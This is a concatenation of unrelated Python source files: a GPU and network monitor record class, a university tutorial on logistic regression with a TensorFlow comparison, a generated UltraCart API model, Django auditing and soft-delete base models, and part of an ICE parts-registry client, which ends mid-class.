    def gpu_usage(self):
        """Decoration function to access __gpu_usage."""
        return self.__gpu_usage

    @gpu_usage.setter
    def gpu_usage(self, gpu_usage):
        """Set the gpu usage.

        Args:
            gpu_usage (list): list of gpu usage.
        """
        self.__gpu_usage = gpu_usage

    @property
    def gpu_temperature(self):
        """Decoration function to access __gpu_temperature."""
        return self.__gpu_temperature

    @gpu_temperature.setter
    def gpu_temperature(self, gpu_temperature):
        """Set the gpu temperature, unit: Celsius.

        Args:
            gpu_temperature (list): list of gpu temperature.
        """
        self.__gpu_temperature = gpu_temperature

    @property
    def gpu_power_limit(self):
        """Decoration function to access __gpu_power_limit."""
        return self.__gpu_power_limit

    @gpu_power_limit.setter
    def gpu_power_limit(self, gpu_power_limit):
        """Set the gpu power limit, unit: Watt.

        Args:
            gpu_power_limit (list): list of gpu power limit.
        """
        self.__gpu_power_limit = gpu_power_limit

    @property
    def gpu_mem_used(self):
        """Decoration function to access __gpu_mem_used."""
        return self.__gpu_mem_used

    @gpu_mem_used.setter
    def gpu_mem_used(self, gpu_mem_used):
        """Set the used gpu memory, unit: MB.

        Args:
            gpu_mem_used (list): list of used gpu memory.
        """
        self.__gpu_mem_used = gpu_mem_used

    @property
    def gpu_mem_total(self):
        """Decoration function to access __gpu_mem_total."""
        return self.__gpu_mem_total

    @gpu_mem_total.setter
    def gpu_mem_total(self, gpu_mem_total):
        """Set the total gpu memory, unit: MB.

        Args:
            gpu_mem_total (list): list of total gpu memory.
        """
        self.__gpu_mem_total = gpu_mem_total

    @property
    def gpu_corrected_ecc(self):
        """Decoration function to access __gpu_corrected_ecc."""
        return self.__gpu_corrected_ecc

    @gpu_corrected_ecc.setter
    def gpu_corrected_ecc(self, gpu_corrected_ecc):
        """Set the count of corrected (single bit) ecc error.

        Args:
            gpu_corrected_ecc (list): list of gpu corrected ecc error.
        """
        self.__gpu_corrected_ecc = gpu_corrected_ecc

    @property
    def gpu_uncorrected_ecc(self):
        """Decoration function to access __gpu_uncorrected_ecc."""
        return self.__gpu_uncorrected_ecc

    @gpu_uncorrected_ecc.setter
    def gpu_uncorrected_ecc(self, gpu_uncorrected_ecc):
        """Set the count of uncorrected (double bit) ecc error.

        Args:
            gpu_uncorrected_ecc (list): list of gpu uncorrected ecc error.
        """
        self.__gpu_uncorrected_ecc = gpu_uncorrected_ecc

    @property
    def gpu_remap_info(self):
        """Decoration function to access __gpu_remap_info."""
        return self.__gpu_remap_info

    @gpu_remap_info.setter
    def gpu_remap_info(self, gpu_remap_info):
        """Set the gpu remap_info.

        Args:
            gpu_remap_info (list): list of gpu remap_info.
        """
        self.__gpu_remap_info = gpu_remap_info

    @property
    def net_receive(self):
        """Decoration function to access __net_receive."""
        return self.__net_receive

    @net_receive.setter
    def net_receive(self, net_receive):
        """Set the network receive bandwidth, unit: Bytes/s.

        Args:
            net_receive (dict): receive bandwidth for all devices.
        """
        self.__net_receive = net_receive

    @property
    def net_transmit(self):
        """Decoration function to access __net_transmit."""
        return self.__net_transmit

    @net_transmit.setter
    def net_transmit(self, net_transmit):
        """Set the network transmit bandwidth, unit: Bytes/s.

        Args:
            net_transmit (dict): transmit bandwidth for all devices.
        """
        self.__net_transmit = net_transmit

    def to_string(self):
        """Serialize the MonitorRecord object to string.

        Return:
            The serialized string of MonitorRecord object.
        """
        formatted_obj = dict()
        for key, value in self.__dict__.items():
            # The name of internal member is like '_MonitorRecord__name'.
            # For the result object return to caller, need to reformat the 'name' as key.
            formatted_key = key.split('__')[1]
            if isinstance(value, (numbers.Number, str)):
                formatted_obj[formatted_key] = value
            elif isinstance(value, list):
                # flatten per-device lists into 'metric:index' keys
                for i, item in enumerate(value):
                    if isinstance(item, numbers.Number):
                        formatted_obj['{}:{}'.format(formatted_key, i)] = item
                    elif isinstance(item, dict):
                        for k, v in item.items():
                            formatted_obj['{}:{}'.format(k, i)] = v
            elif isinstance(value, dict):
                # network counters are already keyed per device name
                for k, v in value.items():
                    formatted_obj[k] = v
        return json.dumps(formatted_obj)
|
# Sascha Spors, Professorship Signal Theory and Digital Signal Processing,
# Institute of Communications Engineering (INT), Faculty of Computer Science
# and Electrical Engineering (IEF), University of Rostock, Germany
#
# Data Driven Audio Signal Processing - A Tutorial with Computational Examples
# Feel free to contact lecturer frank.schultz@uni-rostock.de
#
# Exercise 11: Binary logistic regression model with just one layer
# Training using gradient descent and forward/backward propagation
# following the derivations and coding conventions from the brilliant
# course https://www.coursera.org/learn/neural-networks-deep-learning
# cf. especially week 2
# compare against model that is trained by TensorFlow
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.keras as keras
# Print library versions so results can be matched to an environment.
print('TF version', tf.__version__,  # we used 2.4.3
      '\nKeras version', keras.__version__)  # we used 2.4.0
# Unseeded RNG: every run draws fresh initial weights for our model.
# rng = np.random.RandomState(1)  # for debug
rng = np.random.RandomState()
verbose = 1  # print training status
def my_sigmoid(z):
    """Element-wise logistic function 1 / (1 + e^(-z))."""
    exp_neg = np.exp(-z)
    return 1.0 / (1.0 + exp_neg)
def cost(y_true, y_pred):
    """Binary cross-entropy cost.

    :param y_true: ground-truth labels in {0, 1}
    :param y_pred: predicted probabilities, strictly inside (0, 1)
    :return: scalar mean of the element-wise log loss
    """
    # vectorized per-sample loss
    L = -(y_true*np.log(y_pred) + (1-y_true)*np.log(1-y_pred))
    # cost = average of all entries in L (idiomatic: no `return(J)` parens)
    return np.mean(L)
def evaluate(y_true, y_pred):
    """Threshold predictions at 0.5 and compute confusion-matrix metrics.

    Inverted label convention, consistent with the TF confusion matrix for
    labels starting at 0:
        label positive == 0
        label negative == 1
    Confusion matrix layout (row = actual label, column = predicted label):
        [TP FN]
        [FP TN]

    Unlike the original implementation, thresholding happens on a copy, so
    the caller's y_pred array is never mutated (callers no longer need to
    pass np.copy()).

    :param y_true: array of true labels in {0, 1}
    :param y_pred: array of predicted probabilities (or hard 0/1 labels)
    :return: (cm, normalized cm, precision, recall, F1 score, accuracy)
    """
    # hard 0/1 decision at threshold 0.5, on a fresh array
    y_pred = np.where(np.asarray(y_pred) >= 0.5, 1, 0)
    TP = np.sum(np.logical_and(np.logical_not(y_true), np.logical_not(y_pred)))
    TN = np.sum(np.logical_and(y_true, y_pred))
    FN = np.sum(np.logical_xor(y_true[y_true == 0], y_pred[y_true == 0]))
    FP = np.sum(np.logical_xor(y_true[y_true == 1], y_pred[y_true == 1]))
    cm = np.array([[TP, FN], [FP, TN]])
    n_cm = cm / np.sum(cm)
    # sensitivity, recall, hit rate, or true positive rate (TPR)
    recall = TP / (TP + FN)
    # precision or positive predictive value (PPV)
    precision = TP / (TP + FP)
    # accuracy (ACC)
    accuracy = (TP + TN) / (TP + TN + FP + FN)
    # balanced F-score, F1 score (harmonic mean of precision and recall)
    F1_score = 2 / (1/precision + 1/recall)
    # NOTE: the original also computed specificity TN/(TN+FP) and NPV
    # TN/(TN+FN) but discarded the results; those dead expressions are gone.
    return cm, n_cm, precision, recall, F1_score, accuracy
# gradient descent hyper parameters
# set up to see how things evolve
# in practice do hyper parameter tuning, see exercise 12
step_size = 0.25
steps = 500
# we create some data
m = 100000  # data examples
nx = 2  # number of features
train_size = 0.8  # 80% are used for training
X, Y = make_classification(n_samples=m,
                           n_features=nx, n_informative=nx,
                           n_redundant=0,
                           n_classes=2, n_clusters_per_class=1,
                           class_sep=1,
                           flip_y=1e-2,
                           random_state=8)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,
                                                    train_size=train_size,
                                                    random_state=None)
m_train = X_train.shape[0]
print('\nm_train', m_train)
X = X_train.T  # our implementation needs transposed data
Y = np.expand_dims(Y_train, axis=0)
# X.shape = (nx, m_train)
# Y.shape = (1, m_train)
print('X train dim', X.shape, 'Y train dim', Y.shape)
# TRAINING PHASE
# OUR MODEL
# we init weights and bias with uniform PDF noise in [-1, 1)
w = (rng.rand(nx, 1) - 1/2) * 2
b = (rng.rand(1, 1) - 1/2) * 2
# we do the batch gradient descent, i.e. take all data at once per epoch
# to calc new weights
for step in range(steps):
    # forward propagation = calc actual prediction, i.e. the model output
    # using the current weights and bias:
    Z = np.dot(w.T, X) + b  # forward step 1 = inner product + bias
    A = my_sigmoid(Z)  # forward step 2 = activation function
    if verbose:
        print('epoch', step, '/', steps, ', our cost on training data',
              cost(Y, A))
    # backward propagation, start at the output from model and subsequently
    # move back to the model input
    # vectorized
    da = -Y / A + (1-Y) / (1-A)  # step 1 -> dL/da
    dz = da * A*(1-A)  # step 2 -> (dL/da) * da/dz
    dw = np.dot(X, dz.T) / m_train  # step 3 -> dL/dw = (dL/da * da/dz) * dz/dw
    db = np.mean(dz)  # step 4 -> dL/db = dL/da * da/dz * dz/db
    # gradient descent update rule
    w = w - step_size * dw
    b = b - step_size * db
# final metrics on the training set, using the last forward pass
J_train = cost(Y, A)
cm_train, n_cm_train, precision_train, recall_train,\
    F1_score_train, accuracy_train = evaluate(np.copy(Y), np.copy(A))
# TensorFlow MODEL
# single Dense(1, sigmoid) layer == the same logistic regression model
initializer = keras.initializers.RandomUniform(minval=0., maxval=1.)
optimizer = keras.optimizers.SGD(learning_rate=step_size, momentum=0)
# we can also use some other gradient descent methods:
# optimizer = keras.optimizers.Adam()
# optimizer = keras.optimizers.SGD()
loss = keras.losses.BinaryCrossentropy(from_logits=False, label_smoothing=0)
metrics = [keras.metrics.BinaryCrossentropy(),
           keras.metrics.BinaryAccuracy(),
           keras.metrics.Precision(),
           keras.metrics.Recall()]
input = keras.Input(shape=(nx,))
output = keras.layers.Dense(1, kernel_initializer=initializer,
                            activation='sigmoid')(input)
# we can also use default kernel_initializer:
# output = keras.layers.Dense(1, activation='sigmoid')(input)
model = keras.Model(inputs=input, outputs=output)
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
# full-batch training (batch_size == m_train) to match our implementation
model.fit(X.T, Y.T, batch_size=m_train, epochs=steps, verbose=verbose)
# explicit usage of epochs, batch_size hard coded:
# model.fit(X.T, Y.T, epochs=20, batch_size=100, verbose=verbose)
results_train_tf = model.evaluate(X.T, Y.T, batch_size=m_train,
                                  verbose=verbose)
# print results of our model vs. TF model
# NOTE(review): model.summary() prints itself and returns None, so this
# also emits a trailing 'None' line - presumably accepted for a tutorial.
print(model.summary())
print('\n\nmetrics on training data:')
print('our cost', J_train)
print('TF cost ', results_train_tf[0])
print('our accuray', accuracy_train)
print('TF accuracy', results_train_tf[2])
print('our precision', precision_train)
print('TF precision ', results_train_tf[3])
print('our recall', recall_train)
print('TF recall ', results_train_tf[4])
print('our F1_score', F1_score_train*100, '%')
print('our confusion matrix\n[TP FN]\n[FP TN] =\n',
      n_cm_train*100, '%')
Y_pred = model.predict(X_train)
Y_pred[Y_pred < 0.5], Y_pred[Y_pred >= 0.5] = 0, 1
cm = tf.math.confusion_matrix(labels=Y_train,
                              predictions=Y_pred,
                              num_classes=2)
print('TF confusion matrix')
print(cm / m_train * 100)
print('\nmodel weights:')
print('ours\nw', w.T,
      '\nb', b)
print('TF\nw', model.get_weights()[0].T,
      '\nb', model.get_weights()[1])
# TESTING PHASE
# we check model performance on !! unseen !! test data
m_test = X_test.shape[0]
print('\nm_test', m_test)
X = X_test.T  # our implementation needs transposed data
Y = np.expand_dims(Y_test, axis=0)
# X.shape = (nx, m_test)
# Y.shape = (1, m_test)
print('X test dim', X.shape, 'Y test dim', Y.shape)
# OUR MODEL
# do model prediction == forward propagation using test data
A = my_sigmoid(np.dot(w.T, X) + b)  # Yhat
J_test = cost(Y, A)
cm_test, n_cm_test, precision_test, recall_test,\
    F1_score_test, accuracy_test = evaluate(np.copy(Y), np.copy(A))
# TensorFlow MODEL
results_test_tf = model.evaluate(X.T, Y.T, batch_size=m_test,
                                 verbose=verbose)
# print results of our model vs. TF model
print('\n\nmetrics on test data:')
print('our cost', J_test)
print('TF cost ', results_test_tf[0])
print('our accuray', accuracy_test)
print('TF accuracy', results_test_tf[2])
print('our precision', precision_test)
print('TF precision ', results_test_tf[3])
print('our recall', recall_test)
print('TF recall ', results_test_tf[4])
print('our F1_score', F1_score_test*100, '%')
print('our confusion matrix\n[TP FN]\n[FP TN] =\n',
      n_cm_test*100, '%')
Y_pred = model.predict(X_test)
Y_pred[Y_pred < 0.5], Y_pred[Y_pred >= 0.5] = 0, 1
cm = tf.math.confusion_matrix(labels=Y_test,
                              predictions=Y_pred,
                              num_classes=2)
print('TF confusion matrix')
print(cm / m_test * 100)
# plot
if nx == 2:  # 2D plot of data and classification line
    # evaluate the trained decision function on a regular feature grid
    f1 = np.arange(-6, 6, 0.1)
    f2 = np.arange(-6, 6, 0.1)
    xv, yv = np.meshgrid(f1, f2)
    tmp = my_sigmoid(w[0]*xv + w[1]*yv + b)
    tmp[tmp < 0.5], tmp[tmp >= 0.5] = 0, 1
    plt.figure(figsize=(10, 10))
    plt.subplot(2, 1, 1)
    plt.plot(X_train[Y_train == 0, 0], X_train[Y_train == 0, 1], 'C0o', ms=1)
    plt.plot(X_train[Y_train == 1, 0], X_train[Y_train == 1, 1], 'C1o', ms=1)
    plt.contourf(f1, f2, tmp, cmap='RdBu_r')
    plt.axis('equal')
    plt.colorbar()
    plt.title(X_train.shape)
    plt.xlabel('feature 1')
    plt.ylabel('feature 2')
    plt.subplot(2, 1, 2)
    plt.plot(X_test[Y_test == 0, 0], X_test[Y_test == 0, 1], 'C0o', ms=1)
    plt.plot(X_test[Y_test == 1, 0], X_test[Y_test == 1, 1], 'C1o', ms=1)
    plt.contourf(f1, f2, tmp, cmap='RdBu_r')
    plt.axis('equal')
    plt.colorbar()
    plt.title(X_test.shape)
    plt.xlabel('feature 1')
    plt.ylabel('feature 2')
    plt.savefig('exercise11_binary_logistic_regression_tf.png')
if False:  # check our confusion matrix handling
    # inverted logic!
    # label positive == 0
    # label negative == 1
    # TP
    y_true = np.array([0])
    y_pred = np.array([0])
    cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
    print('TP', cm)
    # FN
    y_true = np.array([0])
    y_pred = np.array([1])  # <- 1...neg label, which is false against y_true=0
    cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
    print('FN', cm)
    # FP
    y_true = np.array([1])
    y_pred = np.array([0])  # <- 0...pos label which is false against y_true=1
    cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
    print('FP', cm)
    # TN
    y_true = np.array([1])
    y_pred = np.array([1])
    cm, n_cm, precision, recall, F1_score, accuracy = evaluate(y_true, y_pred)
    print('TN', cm)
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OrderItemEdiLot(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'lot_expiration': 'str',
        'lot_number': 'str',
        'lot_quantity': 'int'
    }

    attribute_map = {
        'lot_expiration': 'lot_expiration',
        'lot_number': 'lot_number',
        'lot_quantity': 'lot_quantity'
    }

    def __init__(self, lot_expiration=None, lot_number=None, lot_quantity=None):
        """
        OrderItemEdiLot - a model defined in Swagger
        """
        self._lot_expiration = None
        self._lot_number = None
        self._lot_quantity = None
        self.discriminator = None

        if lot_expiration is not None:
          self.lot_expiration = lot_expiration
        if lot_number is not None:
          self.lot_number = lot_number
        if lot_quantity is not None:
          self.lot_quantity = lot_quantity

    @property
    def lot_expiration(self):
        """
        Gets the lot_expiration of this OrderItemEdiLot.
        Lot expiration

        :return: The lot_expiration of this OrderItemEdiLot.
        :rtype: str
        """
        return self._lot_expiration

    @lot_expiration.setter
    def lot_expiration(self, lot_expiration):
        """
        Sets the lot_expiration of this OrderItemEdiLot.
        Lot expiration

        :param lot_expiration: The lot_expiration of this OrderItemEdiLot.
        :type: str
        """

        self._lot_expiration = lot_expiration

    @property
    def lot_number(self):
        """
        Gets the lot_number of this OrderItemEdiLot.
        Lot number

        :return: The lot_number of this OrderItemEdiLot.
        :rtype: str
        """
        return self._lot_number

    @lot_number.setter
    def lot_number(self, lot_number):
        """
        Sets the lot_number of this OrderItemEdiLot.
        Lot number

        :param lot_number: The lot_number of this OrderItemEdiLot.
        :type: str
        """

        self._lot_number = lot_number

    @property
    def lot_quantity(self):
        """
        Gets the lot_quantity of this OrderItemEdiLot.
        Lot quantity

        :return: The lot_quantity of this OrderItemEdiLot.
        :rtype: int
        """
        return self._lot_quantity

    @lot_quantity.setter
    def lot_quantity(self, lot_quantity):
        """
        Sets the lot_quantity of this OrderItemEdiLot.
        Lot quantity

        :param lot_quantity: The lot_quantity of this OrderItemEdiLot.
        :type: int
        """

        self._lot_quantity = lot_quantity

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, OrderItemEdiLot):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
from django.conf import settings
from django.db import models
from django.urls import reverse
from . import global_request
class AuditedModel(models.Model):
    """Abstract base that stamps create/update timestamps and users.

    CAVEAT 1:
    If using a custom user model, add the following line to the top:
    from api.models.user_profile import User  # noqa: F401
    It's needed for get_model in settings.
    CAVEAT 2:
    All api calls that add or edit a line to your database should be
    authenticated; the current user is read from a thread-local helper
    (global_request), which yields None for unauthenticated requests.
    """
    create_at = models.DateTimeField(auto_now_add=True)
    create_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT, related_name='%(class)s_create',
                                  null=True, blank=True)
    update_at = models.DateTimeField(auto_now=True)
    update_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT, related_name='%(class)s_update',
                                  null=True, blank=True)

    class Meta:
        abstract = True
        # Reverse-chronological default ordering; override per model as
        # needed, but it's a good default for most models.
        ordering = ['-create_at', '-update_at']

    def save(self, *args, **kwargs):
        """
        Store create_by if it's not assigned yet (first time the object is
        saved) and always overwrite update_by.
        """
        current_user = global_request.get_current_user()
        if not self.create_by:
            self.create_by = current_user
        self.update_by = current_user
        # zero-arg super() for consistency with the rest of this module
        return super().save(*args, **kwargs)
class PersistentModelQuerySet(models.QuerySet):
    """Model implementing QuerySet for PersistentModel: allows soft-deletion"""
    def delete(self):
        # Soft-delete: flag the rows instead of issuing a SQL DELETE.
        # NOTE(review): returns None, whereas Django's QuerySet.delete()
        # returns a (count, details) tuple - confirm no caller relies on it.
        self.update(deleted=True)
class PersistentModelManager(models.Manager):
    """Model implementing default manager for PersistentModel: filters 'deleted' elements"""
    def inactive(self):
        # Only soft-deleted rows (goes through the default manager again).
        return self.model.objects.filter(deleted=True)
    def active(self):
        # Only live (non-deleted) rows.
        return self.model.objects.filter(deleted=False)
    def filter(self, *args, **kwargs):
        # Pass active_only=False to include soft-deleted rows.
        active_only = kwargs.pop('active_only', True)
        qs = super().filter(*args, **kwargs)
        if active_only:
            return qs.filter(deleted=False)
        return qs
    def all(self, *args, **kwargs):
        # Same active_only escape hatch as filter().
        active_only = kwargs.pop('active_only', True)
        qs = super().all(*args, **kwargs)
        if active_only:
            return qs.filter(deleted=False)
        return qs
    def get_queryset(self, **kwargs):
        # NOTE(review): kwargs are accepted but ignored here - confirm that
        # is intentional before relying on them.
        return PersistentModelQuerySet(self.model, using=self._db)
class PersistentModel(models.Model):
    """Abstract class allowing soft-deletion"""
    deleted = models.BooleanField(default=False)
    objects = PersistentModelManager()
    class Meta:
        abstract = True
    def delete(self):
        # Soft-delete a single instance: flag and persist, never SQL DELETE.
        # NOTE(review): signature omits Django's (using=..., keep_parents=...)
        # arguments - confirm no framework code calls delete() with them.
        self.deleted = True
        self.save()
class CodeModel(models.Model):
    """
    Mixin that exposes a display "code" derived from the object's id.

    Useful when listing objects that need a human-readable label. For
    example, a class Alumno extending this one can override the format as
    _CODE_FORMAT = 'AL-{id:06d}'; printing each object's ``code`` in a list
    then shows AL-000001, AL-000002, ...
    """
    _CODE_FORMAT = 'code-{id:06d}'
    class Meta:
        abstract = True
    @property
    def code(self):
        # provided the pk exists (formatting fails for unsaved instances
        # where self.pk is None)
        return self._CODE_FORMAT.format(id=self.pk)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
"""
Defines classes and utility methods used to communicate with the Index of Composable Elements
(ICE), a.k.a. the "registry of parts". This API is designed to minimize dependencies on other
libraries (e.g. Django model objects) so that it can be used from any part of the EDD codebase,
including remotely-executed code, with a minimum of network traffic and install process. For
example, many of the methods in the IceApi class are called from Celery tasks that may execute on
a physically separate server from EDD itself, where Django model objects shouldn't be passed over
the network.
"""
import itertools
import json
import logging
import re
import requests
from django.conf import settings
from requests.compat import urlparse
from jbei.rest.api import RestApiClient
from jbei.rest.sessions import Session
logger = logging.getLogger(__name__)
# try to grab values from Django settings loaded above; use sane defaults
# ICE_REQUEST_TIMEOUT is the (connect, read) timeout pair, in seconds
ICE_REQUEST_TIMEOUT = getattr(settings, "ICE_REQUEST_TIMEOUT", (10, 10))
# base URL of the ICE installation to talk to
ICE_URL = getattr(settings, "ICE_URL", "https://registry.jbei.org")
# secret key for authenticating to ICE; None disables it - TODO confirm scheme
ICE_SECRET_KEY = getattr(settings, "ICE_SECRET_KEY", None)
class IceApiException(Exception):
    """Error raised for ICE communication failures; carries an HTTP-style status code."""
    def __init__(self, message="", code=requests.codes.internal_server_error):
        super().__init__(message)
        # HTTP status code associated with the failure (default: 500)
        self.code = code
class IceObject:
    """Base class for JSON data from ICE mapped into Python objects."""

    def __init__(self, **kwargs):
        # Every keyword argument becomes an instance attribute verbatim.
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
class Entry(IceObject):
    """The Python representation of an ICE entry."""
    # translation of ICE's Java-style camelCase JSON keys to snake_case
    KEYWORD_CHANGES = {
        "accessPermissions": "access_permissions",
        "basePairCount": "bp_count",
        "bioSafetyLevel": "biosafety_level",
        "canEdit": "can_edit",
        "creationTime": "creation_time",
        "creatorEmail": "creator_email",
        "creatorId": "creator_id",
        "featureCount": "feature_count",
        "fundingSource": "funding_source",
        "hasAttachment": "has_attachment",
        "hasOriginalSequence": "has_original_sequence",
        "hasSample": "has_sample",
        "hasSequence": "has_sequence",
        "intellectualProperty": "intellectual_property",
        "longDescription": "long_description",
        "modificationTime": "mod_time",
        "ownerEmail": "owner_email",
        "ownerId": "owner_id",
        "partId": "part_id",
        "principalInvestigator": "pi_name",
        "principalInvestigatorEmail": "pi_email",
        "principalInvestigatorId": "pi_id",
        "publicRead": "public_read",
        "recordId": "uuid",
        "selectionMarkers": "selection_markers",
        "shortDescription": "short_description",
        "viewCount": "view_count",
    }
    # the "type" value ICE uses for a generic part
    JSON_TYPE = "PART"
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # these things should be lists if not included in inputs
        list_types = (
            "access_permissions",
            "keywords",
            "linked_parts",
            "links",
            "parents",
        )
        for t in list_types:
            if getattr(self, t, None) is None:
                setattr(self, t, [])
    @staticmethod
    def of(json_dict, silence_warnings=False):
        """
        Factory method for creating a Part from a JSON dictionary received from ICE.

        :param json_dict: a dictionary representation of the ICE JSON for this part
        :param silence_warnings: True to suppress warnings about missing type-specific data
        :return: an object representing the part, or None if there's none in the input
        """
        if not json_dict:
            return None
        # build up a list of keyword arguments to use in constructing the Entry.
        python_params = {}
        # linked parts (recursively converted)
        linked_parts = [Entry.of(part) for part in json_dict.get("linkedParts", [])]
        python_params["linked_parts"] = linked_parts
        # parents (recursively converted)
        parents = [Entry.of(parent) for parent in json_dict.get("parents", [])]
        python_params["parents"] = parents
        # set/replace object parameters in the dictionary
        already_converted = {"linkedParts", "parents"}
        # set objects that have a trivial conversion from JSON to Python,
        # changing the style to match Python's snake_case from the ICE's Java-based camelCase
        for json_keyword, json_value in json_dict.items():
            # skip data that translate to custom Python objects rather than builtin data types
            if json_keyword in already_converted:
                continue
            # TODO: investigate JSON data in this dictionary that we don't
            # currently understand / support.
            if json_keyword in ["parameters"]:
                continue
            python_keyword = Entry.KEYWORD_CHANGES.get(json_keyword, json_keyword)
            python_params[python_keyword] = json_value
        # Note: don't shadow Python builtin 'type'!
        part_type = python_params.pop("type", None)
        return _construct_part(python_params, part_type, silence_warnings)
    def __str__(self):
        return f'{self.part_id} / "{self.name}" / ({self.uuid})'
    def to_json_dict(self):
        # copy all data members into a dictionary
        json_dict = self.__dict__.copy()
        # reverse the json -> python keyword changes performed during deserialization
        # NOTE(review): falsy values (0, False, "") are dropped here along
        # with None - confirm that's intended before round-tripping data.
        for json_keyword, python_keyword in Entry.KEYWORD_CHANGES.items():
            value = json_dict.pop(python_keyword, None)
            if value:
                json_dict[json_keyword] = value
        return json_dict
def _construct_part(python_params, part_type, silence_warnings):
    """Instantiate the Entry subclass that matches an ICE part type.

    :param python_params: snake_case keyword arguments collected by Entry.of
    :param part_type: the "type" string from the ICE JSON (e.g. "STRAIN")
    :param silence_warnings: True to suppress the missing-type-data warning
    :raises IceApiException: when part_type is not a supported type
    """
    # map ICE type string -> (class, JSON key holding type-specific data).
    # BUG FIX: the key was misspelled "ARABADOPSIS", so genuine
    # "ARABIDOPSIS" parts (see Arabidopsis.JSON_TYPE) always raised.
    # NOTE(review): the "Arabidopsis" data keyword looks suspect too (the
    # others end in "Data") - confirm against the ICE REST API.
    type_to_class_and_keyword = {
        "PLASMID": (Plasmid, "plasmidData"),
        "STRAIN": (Strain, "strainData"),
        "ARABIDOPSIS": (Arabidopsis, "Arabidopsis"),
        "PROTEIN": (Protein, "proteinData"),
        "PART": (Entry, None),
    }
    try:
        part_class, keyword = type_to_class_and_keyword.get(part_type)
    except Exception as e:
        # .get() returned None for an unknown type; unpacking raised TypeError
        raise IceApiException(f"Unsupported type {part_type}") from e
    class_data = python_params.pop(keyword, None)
    if keyword is None:
        # plain PART: no type-specific payload to merge
        pass
    elif class_data:
        # merge type-specific JSON fields, renaming camelCase -> snake_case
        python_params.update(
            {
                part_class.KEYWORD_CHANGES.get(keyword, keyword): value
                for keyword, value in class_data.items()
            }
        )
    elif not silence_warnings:
        logger.warning(
            "JSON for {class_name} '{part_id}' has type={type}, "
            "but no {field_name} field.".format(
                class_name=part_class.__name__,
                part_id=python_params["part_id"],
                type=part_type,
                field_name=keyword,
            )
        )
    return part_class(**python_params)
class Strain(Entry):
    KEYWORD_CHANGES = {"genotypePhenotype": "genotype_phenotype"}
    JSON_TYPE = "STRAIN"
    def to_json_dict(self):
        """Serialize, re-nesting strain-only fields under ICE's "strainData" key."""
        payload = super().to_json_dict()
        strain_data = {}
        host = payload.pop("host", None)
        if host:
            strain_data["host"] = host
        genotype = payload.pop("genotype_phenotype", None)
        if genotype:
            strain_data["genotypePhenotype"] = genotype
        # only attach the nested block when it carries something
        if strain_data:
            payload["strainData"] = strain_data
        return payload
class Folder(IceObject):
    """Python representation of an ICE folder and the entries it contains."""
    # build a dict of keywords for translating field names from Java-based conventions used in
    # ICE's JSON to Python style names
    keyword_changes_dict = {
        "folderName": "name",
        "count": "entry_count",
        "propagatePermission": "propagate_permission",
        "canEdit": "can_edit",
        "creationTime": "creation_time",
    }
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # convert raw JSON entries to Entry objects.
        # BUG FIX: read via getattr with a default - the old code accessed
        # self.entries unconditionally and raised AttributeError whenever
        # the source JSON had no "entries" key.
        self.entries = [Entry.of(entry) for entry in getattr(self, "entries", None) or []]
    @staticmethod
    def of(json_dict):
        """Factory: build a Folder from its ICE JSON dictionary."""
        python_object_params = {}
        for json_key, value in json_dict.items():
            python_keyword = Folder.keyword_changes_dict.get(json_key, json_key)
            python_object_params[python_keyword] = value
        return Folder(**python_object_params)
    def to_json_dict(self):
        """Serialize back to ICE's Java-style JSON field names."""
        json_dict = {
            java: getattr(self, python)
            for java, python in self.keyword_changes_dict.items()
        }
        # NOTE(review): assumes "id" and every mapped attribute were present
        # in the source JSON; serialization raises otherwise - confirm.
        json_dict["id"] = self.id
        json_dict["entries"] = [entry.to_json_dict() for entry in self.entries]
        return json_dict
# Design note: all part-specific params are currently optional so that we can still at least
# capture the part type when the part gets returned from a search without any of its type-specific
# data. TODO: confirm with Hector P. that this is intentional, then make them non-optional if
# needed
class Plasmid(Entry):
    """ICE entry of type PLASMID, with plasmid-specific JSON fields."""
    KEYWORD_CHANGES = {
        "originOfReplication": "origin_of_replication",
        "replicatesIn": "replicates_in",
    }
    JSON_TYPE = "PLASMID"
class Protein(Entry):
    """ICE entry of type PROTEIN, with protein-specific JSON fields."""
    KEYWORD_CHANGES = {"geneName": "gene_name"}
    JSON_TYPE = "PROTEIN"
class Arabidopsis(Entry):
    """ICE entry of type ARABIDOPSIS (seed), with seed-specific JSON fields."""
    KEYWORD_CHANGES = {
        "harvestDate": "harvest_date",
        "seedParents": "seed_parents",
        "plantType": "plant_type",
